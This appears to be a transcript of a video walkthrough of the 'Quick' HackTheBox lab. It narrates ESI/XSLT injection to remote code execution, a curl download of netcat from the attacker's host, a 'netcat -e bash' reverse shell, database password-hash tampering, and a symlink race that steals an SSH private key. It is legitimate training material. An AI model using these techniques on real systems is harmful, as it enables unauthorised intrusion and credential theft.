Hey, what's up everyone? Today I'm doing Quick from HackTheBox. This was a hard Linux box created by Mr. Reboot. For this box, we used the Quick protocol to get initial login documentation that gets us into the web portal. We used an ESI injection to get remote code execution on the box. We gain access to a database and a new virtual host during some file enumeration, and this allows us to pivot users to the server admin. And from there, we escalate to root by finding a URL encoded password in the cache directory. So let's get started. Okay, we're going to start this box off with nmap, sv, sc, oa, put in the nmap directory and we'll call it quick. And the IP address is 10.10.10.186. I've already run this, so we can take a look at the output. And we see port 22 and port 9001 open HTTP. So we can take a look at that in Firefox. And we just see new broadband services. From here, we can get started, and it forwards us to port 9001. Login PHP, and we don't really have an email to go off of, so we can go back and we see check our clients. So if we go here, we have a list of clients and the country they're from. So Wink is from the UK, Lazy Coop is from China, and if we come back, we have Tim, Roy, Elisa, and James, and the companies that they work for. So from here, we can start to build out an email list. So if we come over here and we start our notes, and we can say quick. And we have a possible emails. We have Tim at Q Consulting. We have Roy at Darkwing, Eliza at Wink, James at Lazy Coop, and going back to the client list, we can see the countries they're from. So this could be qconsulting.co.uk. Darkwing is .com, it's from the US, maybe .net. Wink is UK, so .co.uk. Lazy Coop, China, so maybe .cn. And if none of these work, we could also try France, Italy. We could swap out com and net in these. So we have a list of possible emails. So we don't really have too much to go off of from here. We do see latest TLS and HTTP support here. And so that's portal.quick.htb. So if we add that to our hosts, and we try to go there, it says it's unable to connect. Could be temporarily unavailable or too busy. Try again in a few moments. The box name is a big hint here. Quick is HTTP3, or it's HTTP3 uses the Quick protocol. So if we ran over to Google, there is a good HTTP3 curl Docker image that we can use. Okay, so we could just run docker run, and then it's going to remove the image, and then curl this page. So it's going to have to pull that down. I'll pause it till it's completed. Okay, and it completed, but it looks like the command maybe didn't run. Okay, so we can try this again, except we can try HTTP3. Oh, it's not resolving the host. 10.10.10.186. And we get some output. We see that there is a contact, about, references, and so we could take a look at these. So we could look at the references. And in here we see a docs quick start and a docs connectivity. So we could do docs quick start. -o quickstart.pdf. Does that work? So it doesn't save it in our directory. So instead, what I'm going to do is drop into a shell and then copy it. Like this. And then we can curl this again. And it's there. So we can do the same thing, but instead of quick start, we can do connectivity. Okay, so we've saved those. So now I can just copy them, I think with docker cp tab out for my image. And we'll copy that. And then it's in opt, looks like, connectivity.pdf here. And we'll do the same thing with quick start. And so now we have those locally. So we can just get out of this for now. And just get out of that completely. Okay, so let's check out quick start. And we just see a PDF on some information, read some more on our website. If we go back and look at the other PDF, we see how to connect. You can use your registered email and quick access as a password. So we have a possible password. So add that to our notes. And from here, let's go test these out and see if any of these work. Add the login portal. And so we can look at our emails. Here, I'll bring this over so it's easier to copy paste. There we go. Okay. So we'll try Tim. Didn't work. Try Roy. Didn't work. Try Elisa. And it lets us log in. So now we're logged in as Elisa. So we can add that to our notes. And it looks like this is a ticketing system. Okay, so from here, maybe we can create a ticket. And we can just title it test, and we'll say, we'll just leave the default message. Okay, and it gives us 7539. We can search for it. Doesn't seem to do anything. What if we go to it by hostname? Interesting. Okay, so looks like it logged us out. So we can try logging back in. I don't think I copied that right. Yeah, okay. So that's our email. Okay, we're logged in. Let's create a ticket. Call it test. Submit. See if we can search for it. And we're not getting anything back. What if we went to search.php? And we searched for our ticket number. Okay, so it looks like it takes in the parameter search, and then it returns back the title and description and the status. So if we went back over here, where we can create a ticket, we can try some kind of injection, like HTML injection, and see if this works. Submit, grab our ticket number, head back over to search, throw it in here, and it looks like HTML injection works, so maybe we could try some other type of injections. If we look at the traffic that's coming through, so let's throw this over to where Burp Suite is, turn our intercept on, go turn our proxy on. And intercept this request. Send it over to repeater with Control R. And look at the response. It looks like we get powered by ESI gate. So if we went, copy this, turn our proxy off real quick. And look for an injection here. Maybe we'll find something. So it looks like maybe there's some kind of XSLT injection that we can do. So looking at this, we see a possible RCE. So if we grab this, went and we wanted to submit a ticket, and we put in RIP here, which is 10.10.14.22, and we'll just say evil.xsl, and the style sheet can be the same thing, that's fine, and we'll just call this evil test. And if we set up a listener, on port 80, do we get a callback when we search for this? 7010. Come over here, search for it, and it looks like we do get a callback. It couldn't find the file because it doesn't exist, but cool. So we got a callback. So from here, how can we use this further? Looking here, we can just give it looks like a poisoned XML. So we'll come over here and we'll call this test.xml. And it looks like the command is here. It's touching a file. So what I want to do is I want to see if maybe we have curl on the box. So we could try curl http 10.10.14.22. And we'll try to grab netcat. Okay, so I'll copy netcat into the directory. We'll throw up a listener. And we will go back. And we'll copy this. And I'm actually going to put it over here in case we have to do it again. It'll be easy to resend it. Because our IP here is going to be 10.10.10 14 or 10.10.14.22. Because if something goes wrong, I just don't want to have to type this a bunch. Okay, so we'll save that. Head back over here. Maybe put this somewhere where it's a little bit easier to read. Create a new ticket. Throw this in here. Test. And we'll see if we get a callback whenever we search for this. So heading over to our terminal. Looks like it wasn't able to find... Oh, it's because I called it test.xml. Okay, so... let's try that again. Raise the ticket. Put in our ESI injection. Search for it. See what happens. Looks like nothing happened. It's not calling back at all. Oh, looks like maybe there's an issue. Maybe the box is down. One sec. Okay, box is back. Heading back over here. Looks like something happened. This is a command it ran, so maybe it worked. Looks like it did grab netcat. I'm not sure if you curl something if it automatically saves it. So if I curl localhost netcat. Okay, so I need to give it an output. Okay, so but curl works. So we can come back here and we can change our XSL to curl netcat -o netcat, like that. I'm pretty sure that works. I guess let's test it again. Perfect. Okay, so from here, oh, that's not the right one. We want our ticket. Okay, we'll grab this again, create a new ticket. Submit that. 2699. Search for that. Didn't like that. 2699. Interesting. Okay, we'll try that again. Seven 721. Put that over here. It's not finding it. It's interesting. Oh, but it looks like we're still getting callbacks, but it's for some reason it's calling the full path. So maybe we need to change this for some reason. So we'll come back over here, make a new ticket, and we'll just change the name to test2. Submit that. 5179. Oh, we'll need to move test to test2.xsl and see if we get a callback there. Search for our new ticket. It looks like that worked. So it looks like it grabbed netcat. So we're gonna need to probably do this again. And we'll need to change the mode of the file. So we can chmod, make it executable. And I'm pretty sure it's just going to call this full path again, so I'm just going to change the file to test3. And then we can change it when we create our ticket. Okay, so create a new ticket, test3. Submit that. 1002. Looks like it ran. Okay, so then we need to do one more. And we need to run a reverse shell. So we can try netcat -e, then bash, IP address 10.10.14.22, and we'll do 1337. Okay, and so that should run. We'll move test3 to test4. And create one more ticket. And we're gonna set up a listener on 1337. Head back over here, create a new ticket. Hopefully the last ticket. And it's test4. Submit that. 1206 is our new ticket number. Okay, so it looks like hopefully this ran. And we didn't get a shell. Great. It did grab our XSL. So I wonder what happened. Oh, it might not be, it's not running with the full path. I see, so we need // here. Okay. And we'll move this to test 5. Hopefully this one is our last XSL. Okay, create one more ticket. That's 5. Send that off. Let's search for it. And it looks like we got a shell back. Cool. Okay, so we're Sam. Can we go into home Sam? Okay, and the first thing I'm gonna do, it looks like we have user.text, but I'm gonna go into SSH. And it looks like there is no SSH, so I'm gonna make a directory .ssh since we saw port 22 open on the box. Okay, and then I'm gonna ssh-keygen. And we're gonna call this Sam key. Cat. It's just easier to copy and paste real quick to do. This. And we are going to echo that into authorized keys and see if we can SSH with that. Sam at 10.10.10.186. Make sure this works. Didn't set a password. So it looks like maybe that's not gonna work. Let's see how mine is set up, because I'm pretty sure that's how it works. Oh, I don't have an authorized keys on here. Okay. Is this file here? Oh, I spelled authorized keys wrong. Okay, so that's fine. Here into authorized keys. Okay, we'll try the same thing. SSH with Sam key, Sam at 10.10.10.186. Okay, and we're in a Sam. So we can exit this horrible shell and not have to worry about doing all the XSLs again. So we can kill our Python listener. Come back over here, kill the shell, SSH-I, Sam key, Sam at 10.10.10.186. We'll have a better shell. We can get rid of this. And we can read user.text. Okay, so from here, looks like we may need to escalate to a different user. Who else is on the box? Looks like we have srvadm. So coming into here, can we see anything? Are there any good files in here? We can't read anything. For bash rc and profile, so nothing there. Let's go look at the web page where we were, see if there's anything we missed. Looks like we have a jobs and a printer. Let's look in HTML. We have a db.php, so let's take a look in there. It looks like we have db.adm and db password as a password, so this creates a new SQL connection on the database quick, it looks like. So we could do mysql -u db adm, and with the password, enter this password. and it looks like we're able to log into MySQL. So show databases. Show databases. Looks like we have MySQL quick, so we could take a look at that quick table, or that quick database. So use quick, show tables. It looks like we have jobs, tickets, and users. So if we went into the users, select everything from users. It looks like we have two users, Elisa, which we already know the password for, and srvadm. So maybe this one has different privileges of some kind. So what I'm gonna do is I'm just gonna we could try to take this hash and crack it, but I'm gonna try to do something a little simpler and just take this hash and change srvadm's password. And then that way we don't have to do any cracking or anything. So we could say set update users set password equals this hash where email equals srvadm's. And I think this will work. Okay, so then if we select star from users, I typed that wrong. They both now have the same hash. So if we went back over to the web page, open a new private browsing window, came here, and we went to login. Maybe we could use this email address and this password. And it lets us log in. It says Elisa, but it let us log in. So I'm not sure what that's about. Okay, but so it looks like maybe that worked. So coming back over here, what else do we have? Nothing really in here. In printer, we have a bunch of stuff. We have another db.php. Which it looks like it's using the same database connection. So whatever this is, maybe we'll be able to use that with the user we just changed. So to find out more about this, we can look at the Apache configuration in etc apache. Actually, what I'm going to do is just go in here, and then I'm just going to grep recursively, case insensitive, number the lines, and we'll search for quick.htb to save us from hunting through all these files. Okay, so in 000 default conf, we have another virtual host. So let's grab this, put it in etc hosts. Go check it out. So that was printer v2.quick.htb. Looks like nothing worked here, but maybe it's on port 9001. And it looks like we have a new sign-in page. So let's try that password we just changed. And I've already forgot the email. So we'll just go back up a little bit. put this in our notes. Okay, and over here, we've got our email address, and can we log in? Looks like we're able to log in with that changed password. So from here, looks like we have some printers. No printers have been added. Please add one. And over to add a printer. We'll just call this test printer. Type, network, profile default, IP address, try localhost, port 9100. Looks like it was added. So if we go over to printers, we try to print something, it can't connect, so it looks like it might have to connect. We head over to add printer, and we'll call this my printer. Network, IP address 1010.1422, port 1234. Add printer, and we'll set up a listener and see if we can connect to that. We'll go ahead and get rid of this printer since we don't need it and try to print something. And it looks like we got to connect. So throw up the listener again, head over here, and it says please add a job. So we'll just say hello, this is a test, and we'll print it. Job assigned. Looking back over at our shell, it looks like it prints whatever we give it. So we could try something like code injection here to see if maybe this works. Here, I'm going to put this in a new pane. Not letting me select the printer I want. So printers, this one, print, add a job, try maybe who am I. It doesn't do anything. So the only thing that we can hope is maybe this printer is running as a different user, and we may be able to get it to do something cool. Like earlier, we added an SSH key for Sam. Maybe there is an SSH key for server admin. Can't go in there, so we don't know. But what we can do is we can go look at what is happening in here. So if we... Here, I'm gonna clear this out, just so it's a little bit cleaner. If we look in here, we see printer. If we go in here, and we can look and see maybe what job.php is doing. It looks like when we submit something, maybe it creates a file, it puts that file in jobs, it changes that to 777 so anyone can write to it, and then it executes something. So whatever this is doing is it's allowing us to read and write to a file whenever the job is created. So if we went into jobs and we just did while true, do for I and ls, do cat I, done, done. And so essentially what these loops are doing is it's saying forever do for everything that's listed in the directory, cat that, pretty much is what that's saying. So if we do something like this and we go and we create a job, we need to set up our listener on 1, 2, 3, 4. And we go to print. And we give it a job, and we just say test 1, 2, 3, and print that. We see that the contents get printed here. So when we think about what's happening here, it's opening a file, it's writing whatever we put in here, and then it's allowing us to read whatever that file is. So a way to maybe take advantage of this is, since it's reading whatever file that is and printing it to us over here, maybe we can change the contents before it gets sent back over netcat, or the printer in this case. So if we change our loop a little bit to be while true, do for I and ls, do link home srvadm .ssh idrsa for the private key, and we would need to get rid of cat because it's not going to cat it. So if we rm the file first, and then after that we link idrsa to that file. I mean, and then we could also try to cat it here. I suppose that would also work, but ideally it'll get printed back over here. And if we ran this, and then we set up a netcat listener, so just to kind of reiterate what's happening here, so forever, while forever, pretty much, because it's true, for every item that's listed in the directory when ls is run, we're going to remove it, and then we're going to link the private key for srvadm to that file, and then we're going to try to cat it. And these just in the loop. So let's try this. Looks like all we got is remove write protected regular file. Okay, so it looks like maybe we need to force this. So we'll do the same loop, except when we rm, we'll rm minus f, and then we'll send again. And it looks like we're not able to read that here, but as you can see, yeah, we weren't able to read it here, but it did definitely get sent over the wire back to us. So it looks like we might have a private key for server admin. So I'm gonna write this to, okay, we should kill the loop, that way it doesn't run forever. srvadm key. And then so we can ssh or chmod that to 600. And then we can try to ssh in with it. And it looks like we're in. So what do we have here? Just looking through this directory, it looks like we have a printers comp, a cups configuration, and cups is just a print server, a debug log, error logs. So maybe some interesting stuff in here. If we go into the cache, and then comp, looking at these, And just kind of scrolling through the output. We've got some funky stuff here on the device URI. So it looks like serveradmin at quick.htb, and then a colon, and then maybe some kind of password at printer v3, which wasn't on the box, but maybe it plans to be in the future. So if we grab this, head over to burp, grab our decoder, just decode this as URL. We get some kind of funky string, and we can just test that to see if that's the root password. Throw it in there, and it looks like it is. So from here, we can read root.txt, and that's pretty much it for the box. I hope y'all enjoyed it, and I'll catch you guys next week.